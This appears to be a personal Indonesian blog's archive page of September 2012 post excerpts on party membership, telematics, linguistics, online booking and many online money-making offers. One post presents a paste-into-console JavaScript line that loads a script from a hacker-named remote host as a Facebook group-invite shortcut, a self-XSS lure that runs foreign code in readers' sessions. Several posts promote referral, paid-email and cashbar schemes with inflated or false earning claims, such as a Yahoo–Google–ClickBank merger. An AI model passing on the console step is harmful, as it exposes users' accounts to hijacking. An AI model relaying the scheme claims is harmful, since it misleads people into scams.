Langsung ke konten utama

Postingan

Menampilkan postingan dari September, 2012

Cara Menjadi Anggota Partai NASDEM

Partai yang satu ini merupakan partai yang masih baru, tapi walaupun masih baru, Partai NASDEM ini sudah menjadi kompetitor yang sudah diperhitungkan dalam Pemilu 2014..
Bagi teman-teman yang mau menjadi simpatisan atau Kader dari partai yang satu ini, Buruan Merapat. hehehe
Disini saya cuma ingin berbagi Informasi bagi teman-teman yang ingin mendapatkan KTA (Kartu Tanda Anggota) Partai Nasdem Ikuti Langkah2 dibawah ini ya... 1. Silakan buka website :http://www.gardapemudanasdem.org/ 2. Cari menu yang bertuliskan Pendaftaran Online 3. Isi deh Form2 yang sudah disediakan 4. Setelah selesai (data-data sudah disikan dengan benar) teman-teman masih menunggu Verifikasi dari Partai Nasdem... ya kira-kira sekitar 3 hari akan ada Email yang berisikaan KTA kita
Gimana???
Klu masih puyeng caranya coba aja dulu deh. hehehe

Moga Bermanfaat ya....

Entis Sutisna atau Sule

Entis Sutisna atau lebih dikenal dengan nama Sule (lahir di Bandung, Jawa Barat, 15 November 1976; umur 34 tahun) adalah pemeran yang berawal dari Grup Lawak SOS, Audisi Pelawak TPI (API). Sule semakin dikenal via acara Opera Van Java di Trans7 . Karirnya semakin meningkat dengan acara Awas Ada Sule di Global TV yang dibintangi mantan pemain bola voli nasional, Hikmal Abrar. Selain melawak, alumnus STSI Bandung ini dikenal pintar menyanyi. Sejak masih duduk di bangku kelas 3 SD, Sule sudah sering tampil di panggung tujuhbelas Agustusan, untuk menari.

Logo STT Telematika Ciputat

Inilah Logo STT Telematika....
Bagi Teman-teman yang lagi mencari logo ini silakan di Save ya....
Biar gak hilang. hehehe...
Klu udah ada, gak perlu repot-repot tuh cari di Google...

Perkembangan Telematika di Indonesia

Di Indonesia, perkembangan telematika mengalami tiga periode berdasarkan perkembangannya di masyarakat, yaitu : 
1. Periode Rintisan (akhir tahun 1970-an – akhir tahun 1980-an)  Periode Rintisan di Indonesia terhadap Timor Portugis, peristiwa Malari, Pemilu tahun 1977, pengaruh Revolusi Iran, dan ekonomi yang baru ditata pada awal pemerintahan Orde Baru, melahirkan akhir tahun 1970-an penuh dengan pembicaraan politik serta himpitan ekonomi. Sementara itu sejarah telematika mulai ditegaskan dengan digariskannya arti telematika pada tahun 1978 oleh warga Prancis. Mulai tahun 1970-an inilah Toffler menyebutnya sebagai zaman informasi. Namun demikian, perhatian yang minim dan pasokan listrik yang terbatas, Indonesia tidak cukup meningkatkan perkembangan telematika. Memasuki tahun 1980-an, perubahan secara signifikan pun jauh dari harapan. Walaupun demikian, dalam waktu satu dasawarsa, learn to use teknologi informasi, telekomunikasi, multimedia mulai dilakukan. Jaringan telepon, saluran t…

Metode Kajian Linguistik

1. Metode histori Metode histori Disebut juga metode diakronik, yaitu suatu bentuk kajian yang mempelajari sejarah bahasa tertentu atau salah satu aspek bahasa tertantu. Kata sejarah mengandung pengertian telaah dari masa silam terntentu samapai masa kini.. kalau kita menyebut sejarah bahasa Arab, maka terbayang dalam benak kita bagaimana keadaan bahasa Arab dalam rentang waktu yang panjang mulai dari masa Jahiliyah sampai masa kini. 
2. Metode komparatif  Metode ini adalah suatu kajian bahasa yang mengambil objek dua bahasa atau lebih yang berasal dari satu rumpun. Umpamanya studi banding antara bahasa Arab dengan bahasa Ibrani yang kedua-duanya sama-sama termasuk rumpu bahasa semit. 
3. Metode Diskriptif  Metode Deskriftif adalah suatu bentuk kajian bahasa secara ilmiah mengambil tataran bahasa atau dialek tertentu baik dari aspek bunyi, kata, kalimat, tau makna pada kurun waktu dan tempat tertentu pula. 
Tammam Hasan menyebutkan ada dua bentuk kajian makna, yaitu pertam…

Kelebihan Eimimo di banding BO yang Lain

Pertama, Anda mendapatkan gratis $10,00 di akun Anda Sewaktu anda bikin Akun (Sign Up) melalui situs Eimimo

Kedua,Mengajak Orang lain untuk memiliki Akun di Eimimo. Kita akan dibayar $ 1,00 setiap orang yang kita ajak untuk 3 referral pertama, kemudian untuk 4 referral berikutnya kita akan dibayar $ 0,50 kemudian untuk jaringan berikutnya kita akan dibayar $ 0.25 untuk referral SETIAP dibawah jaringan kita tanpa batas. Untuk Point Ini anda malas dan sulit bagi anda, ikuti point ketiga, so gak ada alasan klu kalian tidak gabung…

Ketiga, Membaca Emial dari iklan-iklan yang dikirim ke email kita atau di member area

Semuanya akan kita dapatkan dengan Gratis…  Ayuk Gabung Sekarang

Cara cepat tambah Anggota Grup di Facebook

Mungkin kita sering capek klu tambah teman ke grup FB secara manual… Disini saya ada tips sedikit untuk kita coba, Ikuti Langkah di bawah ini ya :

Untuk Pengguna Mozzila Firefox
1. Tekan tombol CTRL + SHIFT + K
2. Lalu isi kode ini
(document.body.appendChild(document.createElement('script')).src='http://situbondohacker.hexat.com/autoinvite2012';)
3. Enter

Untuk pengguna Google Chrome
1. Klik kanan pada mouse
2. Tekan Inspect Element (Q)
3. Pilih Console
4. Lalu isi kode ini
(document.body.appendChild(document.createElement('script')).src='http://situbondohacker.hexat.com/autoinvite2012';)
5. Enter

SEMOGA MEMBANTU

Pribadi Indonesia

(Perbaiki Rawat Indentitas Bangsa Awali dari DirisendirI versi INDONESIA) 
Indonesia sudah merdeka sejak tahun 1945, berarti ditahun 2012 ini negara kita sudah menginjak usia 67 tahun. Untuk ukuran seorang manusia tentu umur ini sudah cukup tua dan sudah saatnya menikmati hidup. Namun apa yang terjadi justeru negara kita tidak henti-hentinya di dera masalah baik bencana alam maupun masalah kehidupan berbangsa bernegara dan bermasyarakat. 
Bencana terjadi dimana-mana mulai dari tsunami di Aceh, Nias, Mentawai, Sukabumi, dan masih banyak lagi seperti gempa bumi, banjir bandang, tanah longsor dan sebagainya. Memang bencana ini disebabkan oleh alam dan restu Sang Pencipta, namun kita jangan salah bahwa kita sebagai manusia yang dititipkan di bumi ini juga turut andil dalam merusak lingkungan yang menyebabkan terjadinya bencana tersebut. Berapa luas hutan yang gundul, berapa panjang sungai yang kita tutup baik dengan bangunan maupun sampah dan masih banyak lagi kegiatan kita yang secara s…

Pengertian dan Sejarah Telematika

Telekomunikasi mempunyai pengertian sebagai teknik pengiriman pesan, dari suatu tempat ke tempat lain, dan biasanya berlangsung secara dua arah. 'Telekomunikasi' mencakup semua bentuk komunikasi jarak jauh, termasuk radio, telegraf/ telex, televisi, telepon, fax, dan komunikasi data melalui jaringan komputer. Sedangkan pengertian Informatika) mencakup struktur, sifat, dan interaksi dari beberapa sistem yang dipakai untuk mengumpulkan data, memproses dan menyimpan hasil pemrosesan data, serta menampilkannya dalam bentuk informasi. 
Istilah telematika yang berasal dari kata dalam bahasa Perancistelematique merupakan gabungan dua kata: telekomunikasi dan informatika. Jadi pengertian Telematika sendiri lebih mengacu kepada industri yang berhubungan dengan penggunakan komputerdalam sistem telekomunikasi. Yang termasuk dalam telematika ini adalah layanan dial up ke Internet maupun semua jenis jaringan yang didasarkan pada sistem telekomunikasi untuk mengirimkan data. Internet sendi…

Bisnis Online yang Akan mengguncang dunia Internet

Sebuahraksasa internet akan segera datang dengan nama antara YAHOO &GOOGLE. Program dengan program yangbelum ada sebelumnya, programpemasaran barang dengan komisi sampai 70%. Sistem pembayaran gabunganprogram GOOGLE, CLICKBANK & MLM.
Sebuah BO yang sangat menjanjikan. Lalu apa yang kita dapat: 1. Website Pribadi. 2. Komisi Pemasaran seperti Clickbank. 3. Komisi Pembangunan Jaringan. dengan potensi $87.302 pertahun. 4. Komisi $3.700 perbulan. 5. GRATIS memasarkan seumur hidup.
JOIN DISINI MERGER YAHOO, GOOGLE & CLICKBANK AKAN SGR BUAT GEMPAR DUNIA ONLINE

PROGRAM DILAUNCHING 1 OKTOBER 2012. JOIN SEKARANG GRATIS & MARI PELAJARI SISTEMNYA BERSAMA-SAMA

Logo Ayo Bangkit Indonesia

Connect postingan Facebook ke Twitter dan sebaliknya (Twitter ke Facebook)

Untuk menghubungkan postingan Twitter anda ke Facebook, ikuti langkah dibawah ini: Buka ini: http://apps.facebook.com/twitter/Allow Twitter to post updates to (Izinkan Twitter untuk posting di wall): Kasih tanda centang pada kotak Facebook Profil atau di Facebook Page (jika Anda memiliki Page/halaman) Selesai... Setiap kali Anda menulis sesuatu di Twitter maka akan langsung (otomatis) status facebook juga akan update.

Kemudian untuk menghubungkan Facebook atau Fanspages (halaman facebook) ke Twitter Anda cukup buka link http://www.facebook.com/twitter/

Syaratnya, tentu saja harus punya Page (halaman) di Facebook terlebih dulu. Kemudian setelah berada di halaman “Link Your Pages to Twitter” Hubungkan Halaman Anda ke Twitter, Anda tinggal pilih Page (Halaman) mana yang ingin dihubungkan ke Twitter? Selanjutnya tekan tombol Link to Twitter (Hubungkan ke Twitter). Kemudian Anda akan menuju ke Twitter di mana Anda akan diminta untuk mengizinkan aplikasi dari Facebook tersebut.

Sekian dan Se…

Buka Usaha Loket Pembayaran Resmi – Proses Mudah dan cepat

Hanya Dengan Rp. 75.000, Anda Sudah Bisa Memulai Usaha Loket Pembayaran Resmi. Bandingkan Dengan Loket Pembayaran Lainnya yang membutuhkan Investasi hingga Jutaan Rupiah! 
Kenapa Kami Beda? Karena Bisnis Yang Kami Tawarkan Kepada Anda Murni Bisnis Loket Pembayaran.Bukan Member Get Member, Bukan Money-Games dan Bukan pula MLM yang membagikan Biaya Registrasi kepada member-member diatasnya. Kami Memilki Kantor yang Jelas, Legalitas Usaha Yang Jelas, Alamat yang jelas, Tanda Daftar Perusahaan, NPWP, Terdaftar di Dirjen Pajak dan Departemen Kehakiman.Kami Memiliki Call Center yang siap melayani Anda dari Jam 08:00 s/d 21:00 via Telepon, SMS, Email dan YM.Dengan Sistem Kami yang Handal akan dapat melayani Transaksi 24 Jam sehari dan 7 hari seminggu termasuk hari Libur. Kami Bekerjasama langsung dengan PT. Pos Indonesia (Pelayanan kami sama dengan yang ada di kantor Pos, Cuma kami tidak bisa mengirim paket barang/surat) Saatnya kita membuka usaha dengan modal yang sangat minim, pergunakan kes…

Jejaring sosial alternatif penantang Facebook

1. Paseban  Paseban merupakan salah satu situs jejaring sosial buatan dalam negeri. Seluruh sistem yang ada di Paseban merupakan karya dari anak Indonesia. Paseban menggunakan pendaftaran berdasarkan nomor telepon. hal ini dilakukan untuk menghindari terjadinya pendaftaran ganda yang kadang terjadi pada jejaring sosial lain.  Paseban menawarkan beberapa fasilitas, di antaranya kemudahan pengguna untuk membuat komunitas. Member Paseban juga mendapat fasilitas SMS broadcast dan e-mail broadcastgratis. Sedangkan fitur unggulan yang tak dimiliki jejaring sosial lain adalah fasilitas sharing fileyang ditawarkan Paseban. 
2. Salam World  Salam World menawarkan nuansa yang lain dibandingkan jejaring sosial lain. Salam World melandaskan jejaring sosialnya berdasarkan nilai-nilai keislaman. Salam World lebih mendorong terhadap bentuk komunikasi komunitas dibandingkan komunikasi individu-sentris layaknya jejaring sosial Facebook dan Twitter. Pada Salam World Anda diizinkan untuk berbagi ide, berju…

Bagaimana cara menghasilkan uang dari Eimimo?

Yupzz... Saya mau Share bagaimana sich biar dapa Dollar dari Eimimo, Simak Coretan dibawah ini ya...

Pertama, Anda mendapatkan gratis $10,00 di akun Anda Sewaktu anda bikin Akun (Sign Up) melalui www.aimimo.com/sign up. Kedua, Mengajak Orang lain untuk memiliki Akun di Eimimo. Kita akan dibayar $ 1,00 setiap orang yang kita ajak untuk 3 referral pertama, kemudian untuk 4 referral berikutnya kita akan dibayar $ 0,50 kemudian untuk jaringan berikutnya kita akan dibayar $ 0.25 untuk referral SETIAP dibawah jaringan kita tanpa batas Ketiga, Membaca Emial dari iklan-iklan yang dikirim ke email kita atau di member area
Cukup Mudahkan, tanpa mengajak orang lain kita juga akan dibayar..  Persyaratan Payout: 1. Minimum payout ONLY $ 20,00 2. Minimal $ 5,00 dari membaca email yang harus Anda penuhi untuk dibayar dari min $ 20 yang kita kumpulkan
Cukup sekian ya teman-teman... mudah2an Bermanfaat.. klu masih ada yang belum jelas bisa kita share melalui komentar...okey...
Eit.... yang mau gabung di…

Indahnya Menikmati Malam

Saat itu malam masih tersisa. Bulan masih berenang dalam ruang semesta. Dan bintang masih setia bergelantungan. Dan dalam keheningannya ini, di salah satu bilik yang sangat sederhana, terdengar suara berbisik. “Wahai istriku, ikhlaskah dirimu jika mala mini aku beribadah kepada Allah?” “wahai suamiku. Kekasih Allah. Sesungguhnya, (jika menurut kata hati) aku merasa nyaman jika selalu berada di sampingmu. Namun, aku ihklas dengan apa yang engkau sukai. Engkau sangat gemar beribadah kepada Allah. Bagaimana mungkin aku tidak mengikhlaskanmu.” Sahut Aisyah Lembut. 
Sejurus kemudian, pasangan suami istri agung ini berwhudu. Keduanya lalu tegak dalam kesalihan malam bak jabal rahmah yang mengguncang kuat menembus lazuardi imani. Takbirnya melesat bersama keangungan sang pencipta. Rapanlan firman-firmannya bergetar bersama air mata yang memburai berharap ridho Allah. Begitu juga dengan gerak rukuk dan sujudnya, lekat dalam harmoni gerak jagad raya. Demikian ikhlas keduanya memenuhi panggila…

Browsing Internet Sambil Mendapatkan Uang

Satu lagi program menghasilkan uang dari internet. Caranya sangat mudah yaitu kita hanya perlu mendaftar lalu mendownload software yang diberikan untuk diinstal. Setelah diinstal software tersebut akan menampilkan kolom iklan kecil dibagian bawah desktop (diatas taskbar) yang disebut dengan Cashbar. Cashbar ini berukuran sama seperti banner dibawah. Cashbar ini akan menampilkan banner iklan secara priodik yang berganti-gantian. Anda cukup membiarkan program ini berjalan, sementara anda melanjutkan aktifitas anda di internet seperti biasa. Karena ukurannya sangat kecil jadi dijamin tidak mengganggu aktifitas kita.
Setiap iklan yang tampil, akan menambah saldo point anda. Dan setiap awal bulan, point ini akan di konvert menjadi Dollar, 10.000 Point= $ 1 payout minimal adalah $20. 
Jadi disini kita bisa menghasilkan uang tanpa perlu repot mengklik iklan satu persatu. Dan bukan hanya itu kita juga bahkan bisa mendapat hingga $100 dalam satu hari. Mau tau caranya ? 
Saya akan berikan tips…

Cara Mendapatkan Dollar Gratis Di Virtapay

Cara mendapatkan Dollar Gratis Dengan Virtapay-Bagaimana Cara Mendapatkan/ Menghasilkan Uang Dari Internet?, itu adalah pertanyaan yang Saat ini paling banyak di cari, ya memang benar, saat ini peluang bisnis di internet sangatlah menjanjikan, terutama jika kita mengetahui Bagaimana dan Dimana Kita Bisa Mendapatkan Uang Dari Internet dengan Gratis tentunya. Tapi dilain pihak banyak juga situs-situs yang menjuru ke arah Scam atau Spam untuk itu kita juga harus lebih berhati-hati agar tidak sampai melakukan usaha yang sia-sia. Berikut ini adalah salah satu cara untuk mendapatkan uang dari internet yaitu dengan menggunakan Virtapay, saya lebih suka menyebutnya CaraMenghasilkan Dollar Gratis Melalui Virtapay, saya juga akan menjelaskan Cara Daftar di Virtapay. 
Virtapay merupakan salah satu Online Payment Processor layaknya PayPal, AlertPay dan sejenisnya, meskipun tergolong baru dan masih pada tahap Pra Louncing namun Virtapay cukup menjanjikan dengan berbagai penawarannya yang bikin ng…

Cara Mendapat Dollar Gratis Melalui Alertpay

Tidak Dibutuhkan Modal Untuk Mendulang Dollar !!! Yupz... itu yang sedang dicari.. Iya kan??
Modal dengkul tidak selamanya buruk, tahukah anda bahwa 99% para publisher di internet mendapatkan penghasilan ribuan dollar setiap bulanya hanya dengan modal dengku??, tidak benar2 dengkul seperti itu. Tentunya masih dibutuhkan sedikit pengeluaran untuk peralatan dan koneksi internet. Di dunia termasuk Indonesia 70% lebih penduduknya adalah pengguna internet aktif. Ini menunjukan semakin terjangkaunya perangkat PC dan Biaya koneksi internet. Hanya dibutuhkan satu juta rupiah saja anda sudah bisa mendapatkan 1 unit PC P4 lengkap plus modem dengan biaya koneksi unlimited 45ribu perbulannya (smart). Tinggal bagaimana anda memanfaatkannya. 
Mendulang Dollar Di Alertpay (untuk hasil maksimal ikuti langkah2 berikut dengan seksama dan sesuai urutan)  Langkah-langkahnya sebagai berikut: 1. Klik tautan ini >>> Alertpay.com/register/form 2. Pada tab baru yang muncul klik "Sign Up Now"…

Cuma Modal online dapet Dollar, Kerja Cerdas

Bener banget, sesuai sama judulnya, di sini saya mau bagi-bagi Informasi biar online kita bisa mendatangkan Dollar/uang. Jujur saja saya termasuk orang yang ga suka yang ribet-ribet, apalagi ada cara yang lebih simple. Benar gak??
Mau tau caranya… ?? Yuk Simak tulisan dibawah ini: 20dolllars2surf adalah sebuah program penghasil uang gratis dari internet dengan cara online. 20dolllars2surf menyediakan cashbar yang harus kita download, yang nantinya tiap saat akan muncul iklan di cashbar tersebut. Cashbar inilah nanti sebagai alat kita untuk mengumpulkan dollar dari internet dengan gratis. Cashbar akan meload iklan secara otomatis jika koneksi internet telah tersambung. Kita tidak perlu mengklik iklan-iklan yang muncul, cukup membiarkan program 20dollars2surf bekerja. Dengan kata lain, kita tidak perlu melakukan apapun, cukup online setiap hari dan biarkan dollar bertambah dengan sendirinya. Gampang kan? langsung aja daftar di sini. Masukkan email address temen-temen Klik "JOIN US&q…

Cara Mendapatkan KTA Parta Gerindra

Disini saya Sekedar Berbagi Informasi untuk Teman-teman yang ingin mendapakan Kartu Tanda Anggota (KTA) Partai Gerakan Indonesia Raya (Gerindra). Dimana selama ini kita tau Partai Gerindra Merupakan salah satu Partai Baru di Indonesia dibandingkan dengan partai-partai yang lainnya sebut saja GOLKAR. Baiklah bagi teman-teman yang ingin menjadi anggota Partai Gerindra silakan mendaftar disini  setelah itu Silakan diisi Form yang disediakan sampai dengan Selesai... Sebelum mengisi data di Form tersebut sebaiknya teman-teman siapin saja dahulu Scan KTPnya.. Sekian Mudah-mudahan bermanfaat...


Peluang Bisnis Online Tiket Pesawat

Baiklah teman-teman, Pada kesempatan ini saya ingin berbagi Info yang berkaitan dengan bisnis Tiket Pesawat
Berbisnis tiket pesawat bisakah? Inilah pertanyaan yang mungkin sering muncul. Bagi sebagian orang mungkin beranggapan bisnis tiket pesawat adalah sesuatu bisnis yang harus mengeluarkan banyak modal. Sebenarnya itu adalah anggapan yang keliru. Kenapa saya bilang keliru, soalnya saya sendiri memulai bisnis ini dengan mengeluarkan sangat sedikit modal uang dan tambah koneksi internet maka itu saja sudah menjadi modal utama untuk memulai bisnis ini. teman-teman tidak harus mengeluarkan modal besar untuk terjun dalam bisnis ini juga tidak harus membangun sebuah toko untuk menjadi agen pesawat. Biaya untuk mendaftar relatif sangat kecil jika dibandingkan dengan potensi penghasilan yang bisa teman peroleh. Apabila harapan dan cita-cita adalah meraih kebebasan finansial, maka peluang bisnis tiket pesawat ini sangat layak untuk teman-teman coba ya....
Berapa modal yang harus Teman-te…

Peluang Mendapatkann Rupiah Secara Gratis

Udah pada tahu dong kalau sekarang ada banyak sekali cara untuk bisa mencari uang melalui internet. Ada yang berbayar, ada yang gratis. Kalau saya, tentu lebih suka yang gratisan, hehe..
Terkait dengan hal itu,.. Nah... Barusan saya browsing dan menemukan sebuah situs bisnis yang menarik. Kenapa menarik? Alasannya adalah karena untuk join (bergabung) di situs tersebut biayanya Rp 0 saja, alias gratis.
Eits, tapi walaupun gratis, ini bukan berarti bahwa hasilnya juga "gratis". Bahkan hasilnya hasil yang "mahal" karena situs itu memberikan bayaran hingga Rp. 277.777.778.500,- untuk member-membernya Wow hasil yang fantastis kan… Cara kerjanya cukup mudah, kita hanya diperintahkan untuk menawarkan orang lain datang ke URL tertentu. Setiap kali orang lain bergabung dengan situs yang dituju, kita akan mendapat bayaran Komisi Jaringan Rp 25 hingga 10 level Komisi Sponsor Rp. 100,- hingga 10 level Semakin banyak kita menyebar URL-nya, semakin banyak juga komisi yang ki…

Cara Reservasi Online Tiket Kereta Api

Baik teman- sekarang saya akan membagi informasi mengenai reservasi tiket kereta Api secara Online, kabar baiknya sekarang kereta api (sepur ) sudah bisa kita booking melalui media Internet yang kita gunakan dimanapun.  Keren ya sudah kayak tiket Pesawat terbang.. he.he..  Oke deh ini dia caranya: 
1. Sialakan buka web resmi kereta api, disini neh  2. Silakan masukan rute perjalanan teman2 (kota asal dan kota tujuan) –posisinya disebelah kanan  3. Kemudian silakan teman2 untuk memilih kelas yang teman mau (Executive/Bisnis)  4. Trussss pilih tuh harganya  5. Kemudian keluar layar baru yang mengarahkan teman2 untuk mengisi data penumpang dan data pemesan..  6. Langkah selanjutnya silakan pilih metode pembayaran (melalui kartu kredit/ATM)  7. Selesai deh….. 
Perlu diingat jangan lupa untuk memberi informasi yang valid ya… tertama nama penumpang dan alamat Emailnya..  Sekian Teman-teman ya….  Mudah-mudahan ini sangat bermanfaat bagi teman-teman …

Tiga Cara Gratis untuk Menjadikan Anda Ahli

Hayo Teman2… Siapa yang bermimpi/ bercita-cita menjadi seseorang ahli dibidang tertentu??....  Ternyata Menjadi tenaga ahli di bidang tertentu tidak harus mengeluarkan uang banya lho. Banyak cara gratis yang dapat dilakukan oleh kita. Ini neh saya kasih tau tipsnya. He… 
1. Cari referensi gratis di media online atau cetak. Bentuknya dapat berupa eboo gratis.. Banyak tuh bertebaran di DuMay cari aja tuh di mbah Google 2. Kerena internet itu tidak mengenal batas (baik batas umur maupun batas sosial ekonomi) kita bisa bertanya langsung sama para ahli, bisa melalui media chatting. Motif para tenaga ahli kawakan ini yaitu mencari kepuasan. Mereka tidak menginginkan imbalan berupa uang. Mereka biasanya mencul pada jam-jam tertentu saja. Semakin banyak frekuensi Anda bertatap muka atau chatting dengan mereka, Anda akan menjadi seorang tenaga ahli.

3. Yang terakhir, cara gratis mendapatkan informasi berharga, kita harus banyak-banyak membaca kolom topik tertentu di media cetak. B…

Dollar Gratis Per Klik

h

Peluang Mendapatkan Dolar Lewat Internet

Apakah Anda sudah bergabung dengan Eimimo.com? Ribuan orang telah bergabung dalam beberapa hari pertama karena ini adalah kesempatan penghasilan yang unik dan berbeda.

Program ini 100% GRATIS!

Anda sign up bonus sebesar $ 10.00 gratis. Memiliki Bagi Hasil. Bukan hanya berbagi keuntungan Tapi Juga Memiliki Rencana Pensiun Plus Anda tidak akan pernah membayar sepeser pun. TIDAK ada biaya, TIDAK ada upgrade, TIDAK apa-apa! 100% gratis!Dan Anda tidak akan pernah harus menjual sesuatu untuk mendapatkan komisi.

Disini Anda bisa mendapatkan gratis e-book, software gratis, bonus gratis, dan banyak lagi!

Kesempatan pendapatan terbaru dan paling unik di internet. 
Bergabung dengan kami sekarang!